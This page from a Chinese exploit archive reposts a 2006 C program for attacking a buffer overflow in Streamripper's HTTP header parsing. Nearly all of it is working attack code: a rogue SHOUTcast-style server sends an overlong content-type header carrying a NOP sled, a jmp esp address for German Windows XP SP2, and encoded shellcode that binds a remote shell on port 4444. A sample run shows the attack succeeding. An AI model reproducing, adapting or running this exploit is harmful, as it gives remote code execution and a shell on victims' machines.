首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Streamripper <= 1.61.25 HTTP Header Parsing Buffer Overflow Exploit 2
来源:vfocus.net 作者:psylocn 发布时间:2006-08-30  

/*
* name: streamripper <= 1.61.25 win32 remote exploit
*
* bug by: Ulf Harnhammar
* status: public
* exploit: psylocn
* payload: portbind 4444
* **********************************************************
* K:\>exploit.exe 80 0
* [ public-release ]
* streamripper <= 1.61.25 remote exploit
* exploit by psylocn 2006
* bug by Ulf Harnhammar
*
* [+] server started!
* [+] server waits
*
*
* go to next shell
* K:\>streamripper.exe http://127.0.0.1:80
* Connecting...
*
* on other shell
* [+] client conneted!
* [+] exploit send check shell on port 4444
*
* now connect to 127.0.0.1:4444
*/

/* #define _WIN32 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#endif

/* portbind shellcode port 4444*/
unsigned char portbindsc[] =
"\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xaf"
"\xbf\xf8\x2a\x83\xeb\xfc\xe2\xf4\x53\xd5\x13\x67\x47\x46\x07\xd5"
"\x50\xdf\x73\x46\x8b\x9b\x73\x6f\x93\x34\x84\x2f\xd7\xbe\x17\xa1"
"\xe0\xa7\x73\x75\x8f\xbe\x13\x63\x24\x8b\x73\x2b\x41\x8e\x38\xb3"
"\x03\x3b\x38\x5e\xa8\x7e\x32\x27\xae\x7d\x13\xde\x94\xeb\xdc\x02"
"\xda\x5a\x73\x75\x8b\xbe\x13\x4c\x24\xb3\xb3\xa1\xf0\xa3\xf9\xc1"
"\xac\x93\x73\xa3\xc3\x9b\xe4\x4b\x6c\x8e\x23\x4e\x24\xfc\xc8\xa1"
"\xef\xb3\x73\x5a\xb3\x12\x73\x6a\xa7\xe1\x90\xa4\xe1\xb1\x14\x7a"
"\x50\x69\x9e\x79\xc9\xd7\xcb\x18\xc7\xc8\x8b\x18\xf0\xeb\x07\xfa"
"\xc7\x74\x15\xd6\x94\xef\x07\xfc\xf0\x36\x1d\x4c\x2e\x52\xf0\x28"
"\xfa\xd5\xfa\xd5\x7f\xd7\x21\x23\x5a\x12\xaf\xd5\x79\xec\xab\x79"
"\xfc\xec\xbb\x79\xec\xec\x07\xfa\xc9\xd7\xe9\x76\xc9\xec\x71\xcb"
"\x3a\xd7\x5c\x30\xdf\x78\xaf\xd5\x79\xd5\xe8\x7b\xfa\x40\x28\x42"
"\x0b\x12\xd6\xc3\xf8\x40\x2e\x79\xfa\x40\x28\x42\x4a\xf6\x7e\x63"
"\xf8\x40\x2e\x7a\xfb\xeb\xad\xd5\x7f\x2c\x90\xcd\xd6\x79\x81\x7d"
"\x50\x69\xad\xd5\x7f\xd9\x92\x4e\xc9\xd7\x9b\x47\x26\x5a\x92\x7a"
"\xf6\x96\x34\xa3\x48\xd5\xbc\xa3\x4d\x8e\x38\xd9\x05\x41\xba\x07"
"\x51\xfd\xd4\xb9\x22\xc5\xc0\x81\x04\x14\x90\x58\x51\x0c\xee\xd5"
"\xda\xfb\x07\xfc\xf4\xe8\xaa\x7b\xfe\xee\x92\x2b\xfe\xee\xad\x7b"
"\x50\x6f\x90\x87\x76\xba\x36\x79\x50\x69\x92\xd5\x50\x88\x07\xfa"
"\x24\xe8\x04\xa9\x6b\xdb\x07\xfc\xfd\x40\x28\x42\x5f\x35\xfc\x75"
"\xfc\x40\x2e\xd5\x7f\xbf\xf8\x2a\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc";

char part1[] = "ICY 200 OK\r\nicy-notice1:aaaaa\r\n"
"icy-notice2:SHOUTcast Distributed Network Audio Server/FreeBSD v1.9.7<BR>\r\n"
"icy-name:Radioseven - www.radio.de\r\n"
"icy-genre:Dance Trance House\r\n"
"icy-url:http://www.radio.de\r\n"
"content-type:"; //buffer to exploit

char part2[] = "\r\n"
"icy-pub:1\r\n"
"icy-metaint:8192\r\n"
"icy-br:CCCCCCC\r\n\r\n";

char fixstack[] = "\x81\xc4\xff\xef\xff\xff\x44"; //sub esp, 4097 + inc esp

struct targets {
int num;
char name[50];
long jmpaddr;
}
target[]= {
{ 0, "WinXP [sp2 ger] ", 0x7c951eed }, //jmp esp
{ 1, "debug [testing] ", 0x41414141 },
};

void Usage(){

int i;
printf("Usage: exploit.exe port target\n\n"
"Targets:\n\n");
for (i = 0; i < 2; i++)
{
if(target[i].name != 0)
fprintf(stderr," [%u] %s\n",i,target[i].name);
else
break;
}
exit(1);
}

int main (int argc, char **argv) {

char *host;
struct sockaddr_in my_addr;
struct sockaddr_in their_addr;
int sockfd,port,new_sock,sin_size=sizeof (their_addr);

char buffer[3565];

#ifdef _WIN32
WSADATA wsa;
#endif

#ifdef _WIN32
WSAStartup(MAKEWORD(2,0), &wsa);
#endif

printf("[ public-release ]\n");
printf("\tstreamripper <= 1.61.25 remote exploit \n");
printf("\texploit by psylocn 2006\n");
printf("\tbug by Ulf Harnhammar\n\n");

unsigned long ntarget = 0;
if (argc < 3) Usage();
if ((ntarget = atoi(argv[2])) > 1) Usage();

port = (unsigned short)atoi(argv[1]);

if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("[-] socket error\n");
return 0;
}

my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(port);
my_addr.sin_addr.s_addr = INADDR_ANY;

if (bind (sockfd, (struct my_addr *) &my_addr, sizeof (my_addr)) == SOCKET_ERROR) {
printf("\n[-] bind error\n");
return 0;
}
else printf ("[+] server started!\n");

if (listen (sockfd, 3) == SOCKET_ERROR) {
printf("\n[-] listen error\n");
return 0;
}
printf ("[+] server waits\n");

if ((new_sock = accept(sockfd, (struct sockaddr *)&their_addr,&sin_size)) == INVALID_SOCKET) {
printf("\n[-] accept error\n");
return 0;
}
else
printf ("[+] client conneted!\n");

memset ( buffer, 0x90, sizeof(buffer) - 1 );
memcpy ( buffer, part1, strlen(part1) );
memcpy ( buffer+3146, &target[ntarget].jmpaddr, 4);
memcpy ( buffer+3150, fixstack,strlen(fixstack) );
memcpy ( buffer+3150+strlen(fixstack),portbindsc, strlen(portbindsc));

memcpy ( buffer+3515, part2, sizeof(part2) );

if (send(new_sock, buffer,sizeof(buffer)-1, 0) < 0) {
printf("[-] send error\n");
return 0;
}
sleep(2000);
printf("[+] exploit send check shell on port 4444\n");

closesocket(sockfd);
#ifdef _WIN32
WSACleanup ();
#endif
return 0;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Yahoo! Messenger Webcam 8.1 Ac
·VideoScript 3.0 <= 4.0.1.50 Of
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·IBM eGatherer <= 3.20.0284.
·ZipCentral 4.01 ZIP File Handl
·Streamripper <= 1.61.25 HTT
·phpAtm <= 1.21 (include_loc
·phpGroupWare <= 0.9.16.010
·Lanifex DMO <= 2.3b (_incMg
·e107 <= 0.75 (GLOBALS Overw
·0verkill 0.16 (ASCII-ART Game)
·MS Windows NetpIsRemote() Remo
·RCblog <= 1.03 (post) Remot
·VMware 5.5.1 (ActiveX) Local B
·blur6ex <= 0.3.462 (ID) Adm
  推荐广告
CopyRight © 2002-2021 VFocuS.Net All Rights Reserved